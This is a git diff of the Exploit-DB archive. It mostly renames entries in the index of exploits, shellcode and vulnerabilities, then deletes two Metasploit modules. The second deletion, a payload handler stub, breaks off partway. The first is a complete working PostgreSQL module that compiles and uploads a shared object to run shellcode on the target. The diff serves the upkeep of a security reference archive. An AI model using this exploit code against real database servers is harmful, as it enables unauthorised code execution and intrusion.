39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -35556,7 +35551,7 @@ id,file,description,date,author,platform,type,port 39311,platforms/windows/local/39311.txt,"Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39313,platforms/php/webapps/39313.txt,"Food Order Portal - 'admin_user_delete.php' Cross-Site Request Forgery",2014-09-12,KnocKout,php,webapps,0 -39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 +39314,platforms/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote,0 39315,platforms/hardware/dos/39315.pl,"Multiple Aztech Routers - '/cgi-bin/AZ_Retrain.cgi' Denial of Service",2014-09-15,"Federick Joe P Fajardo",hardware,dos,0 39316,platforms/hardware/remote/39316.pl,"Multiple Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote,0 39317,platforms/php/webapps/39317.txt,"WordPress Wordfence Security Plugin - Multiple Vulnerabilities",2014-09-14,Voxel@Night,php,webapps,0 @@ -35569,13 +35564,13 @@ id,file,description,date,author,platform,type,port 39324,platforms/multiple/dos/39324.txt,"Wireshark - dissect_nhdr_extopt Stack-Based Buffer Overflow",2016-01-26,"Google Security Research",multiple,dos,0 39325,platforms/multiple/dos/39325.txt,"Wireshark - hiqnet_display_data Static Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 39326,platforms/multiple/dos/39326.txt,"Wireshark - nettrace_3gpp_32_423_file_open Stack-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39327,platforms/multiple/dos/39327.txt,"Wireshark dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 -39328,platforms/android/remote/39328.rb,"Android ADB Debug Server Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 +39327,platforms/multiple/dos/39327.txt,"Wireshark - dissect_ber_constrained_bitstring Heap-Based Out-of-Bounds Read",2016-01-26,"Google Security Research",multiple,dos,0 +39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 -39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme - 'elegance/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones - '/servlet' HTTP Response Splitting",2014-06-12,"Jesus Oquendo",java,webapps,0 39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080 @@ -35673,7 +35668,7 @@ id,file,description,date,author,platform,type,port 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 -39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 +39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39442,platforms/windows/local/39442.txt,"Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow Exploit",2016-02-15,LiquidWorm,windows,local,0 @@ -35725,7 +35720,7 @@ id,file,description,date,author,platform,type,port 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0 -39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 +39495,platforms/windows/webapps/39495.py,"IBM Lotus Domino R8 - Password Hash Extraction Exploit",2016-02-25,"Jonathan Broche",windows,webapps,0 39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39497,platforms/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,ashx,webapps,0 39498,platforms/php/webapps/39498.txt,"WordPress Ocim MP3 Plugin - SQL Injection",2016-02-26,"xevil and Blankon33",php,webapps,80 @@ -35752,7 +35747,7 @@ id,file,description,date,author,platform,type,port 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0 39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 -39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,Metasploit,windows,local,0 +39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass",2016-03-03,Metasploit,windows,local,0 39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php CSRF Remote Code Execution",2016-03-07,mr_me,php,webapps,0 39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - afd.sys Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80 @@ -35780,7 +35775,7 @@ id,file,description,date,author,platform,type,port 39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0 39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80 39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80 -39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,Metasploit,php,remote,80 +39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution",2016-03-11,Metasploit,php,remote,80 39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0 @@ -35847,7 +35842,7 @@ id,file,description,date,author,platform,type,port 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation Exploit",2016-03-28,"Google Security Research",linux,local,0 -39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 +39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 @@ -35925,7 +35920,7 @@ id,file,description,date,author,platform,type,port 39712,platforms/win_x86-64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 -39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7- LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 +39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 @@ -35939,7 +35934,7 @@ id,file,description,date,author,platform,type,port 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0 39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 -39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 +39730,platforms/ruby/webapps/39730.txt,"NationBuilder - Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 @@ -35975,7 +35970,7 @@ id,file,description,date,author,platform,type,port 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 39767,platforms/multiple/dos/39767.txt,"ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 -39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0 +39768,platforms/multiple/dos/39768.txt,"OpenSSL - Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0 39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0 @@ -35992,7 +35987,7 @@ id,file,description,date,author,platform,type,port 39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,dos,0 39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80 -39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 +39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0 @@ -36160,7 +36155,7 @@ id,file,description,date,author,platform,type,port 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80 -39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 +39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 @@ -36183,7 +36178,7 @@ id,file,description,date,author,platform,type,port 39982,platforms/php/webapps/39982.rb,"Airia - Webshell Upload Exploit",2016-06-20,HaHwul,php,webapps,80 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 -39985,platforms/windows/remote/39985.rb,"DarkComet Server Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 +39985,platforms/windows/remote/39985.rb,"DarkComet Server - Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash PoC",2016-06-21,"Ilca Lucian",linux,dos,0 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) CSRF",2016-06-21,s0nk3y,php,webapps,80 @@ -36277,8 +36272,8 @@ id,file,description,date,author,platform,type,port 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 -40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 -40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 +40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Auth Persistent XSS in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Auth SQLi in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 @@ -36321,7 +36316,7 @@ id,file,description,date,author,platform,type,port 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 -40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 +40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",multiple,local,0 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 @@ -36333,8 +36328,8 @@ id,file,description,date,author,platform,type,port 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40174,platforms/php/webapps/40174.txt,"Wordpress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 -40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post Auth Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 +40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Auth Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 +40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Auth Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)",2016-07-29,CripSlick,lin_x86,shellcode,0 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 @@ -36374,7 +36369,7 @@ id,file,description,date,author,platform,type,port 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Pre-Auth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 diff --git a/platforms/linux/remote/23360.rb b/platforms/linux/remote/23360.rb deleted file mode 100755 index 823afb6b7..000000000 --- a/platforms/linux/remote/23360.rb +++ /dev/null @@ -1,198 +0,0 @@ -### -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'msf/core/exploit/postgres' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Postgres - include Msf::Auxiliary::Report - - # Creates an instance of this module. - def initialize(info = {}) - super(update_info(info, - 'Name' => 'PostgreSQL for Linux Payload Execution', - 'Description' => %q{ - On some default Linux installations of PostgreSQL, the - postgres service account may write to the /tmp directory, and - may source UDF Shared Libraries's from there as well, allowing - execution of arbitrary code. - - This module compiles a Linux shared object file, uploads it to - the target host via the UPDATE pg_largeobject method of binary - injection, and creates a UDF (user defined function) from that - shared object. Because the payload is run as the shared object's - constructor, it does not need to conform to specific Postgres - API versions. - }, - 'Author' => - [ - 'midnitesnake', # this Metasploit module - 'egypt', # on-the-fly compiled .so technique - 'todb' # original windows module this is based on - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ] - ], - 'Platform' => 'linux', - 'Payload' => - { - 'Space' => 65535, - 'DisableNops' => true, - }, - 'Targets' => - [ - [ 'Linux x86', { 'Arch' => ARCH_X86 } ], - [ 'Linux x86_64', { 'Arch' => ARCH_X86_64 } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jun 05 2007' - - )) - - deregister_options('SQL', 'RETURN_ROWSET') - end - - # Buncha stuff to make typing easier. - def username; datastore['USERNAME']; end - def password; datastore['PASSWORD']; end - def database; datastore['DATABASE']; end - def rhost; datastore['rhost']; end - def rport; datastore['rport']; end - def verbose; datastore['VERBOSE']; end - def bits; datastore['BITS'];end - - def execute_command(cmd, opts) - postgres_sys_exec(cmd) - end - - def exploit - version = do_login(username,password,database) - case version - when :noauth; print_error "Authentication failed."; return - when :noconn; print_error "Connection failed."; return - else - print_status("#{rhost}:#{rport} - #{version}") - end - - fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so" - tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname) - - unless tbl && fld && so && oid - print_error "Could not upload the UDF SO" - return - end - - print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})" - begin - func_name = Rex::Text.rand_text_alpha(10) - postgres_query( - "create or replace function pg_temp.#{func_name}()"+ - " returns void as '#{so}','#{func_name}'"+ - " language 'C' strict immutable" - ) - rescue - end - postgres_logout if @postgres_conn - - end - - - # Authenticate to the postgres server. - # - # Returns the version from #postgres_fingerprint - def do_login(user=nil,pass=nil,database=nil) - begin - password = pass || postgres_password - vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") - result = postgres_fingerprint( - :db => database, - :username => user, - :password => password - ) - if result[:auth] - report_service( - :host => rhost, - :port => rport, - :name => "postgres", - :info => result.values.first - ) - return result[:auth] - else - return :noauth - end - rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError - return :noconn - end - end - - - def payload_so(filename) - shellcode = Rex::Text.to_hex(payload.encoded, "\\x") - #shellcode = "\\xcc" - - c = %Q^ - int _exit(int); - int printf(const char*, ...); - int perror(const char*); - void *mmap(int, int, int, int, int, int); - void *memcpy(void *, const void *, int); - int mprotect(void *, int, int); - int fork(); - int unlink(const char *pathname); - - #define MAP_PRIVATE 2 - #define MAP_ANONYMOUS 32 - #define PROT_READ 1 - #define PROT_WRITE 2 - #define PROT_EXEC 4 - - #define PAGESIZE 0x1000 - - char shellcode[] = "#{shellcode}"; - - void run_payload(void) __attribute__((constructor)); - - void run_payload(void) - { - int (*fp)(); - fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); - - memcpy(fp, shellcode, sizeof(shellcode)); - if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) { - _exit(1); - } - if (!fork()) { - fp(); - } - - unlink("#{filename}"); - return; - } - - ^ - - cpu = case target_arch.first - when ARCH_X86; Metasm::Ia32.new - when ARCH_X86_64; Metasm::X86_64.new - end - payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c") - - so_file = payload_so.encode_string(:lib) - - so_file - end -end diff --git a/platforms/multiple/remote/16288.rb b/platforms/multiple/remote/16288.rb deleted file mode 100755 index 76ade8886..000000000 --- a/platforms/multiple/remote/16288.rb +++ /dev/null @@ -1,69 +0,0 @@ -## -# $Id: handler.rb 11845 2011-02-28 03:22:40Z hdm $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ManualRanking - - # - # This module does basically nothing - # - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Generic Payload Handler', - 'Description' => %q{ - This module is a stub that provides all of the - features of the Metasploit payload system to exploits - that have been launched outside of the framework. - }, - 'License' => MSF_LICENSE, - 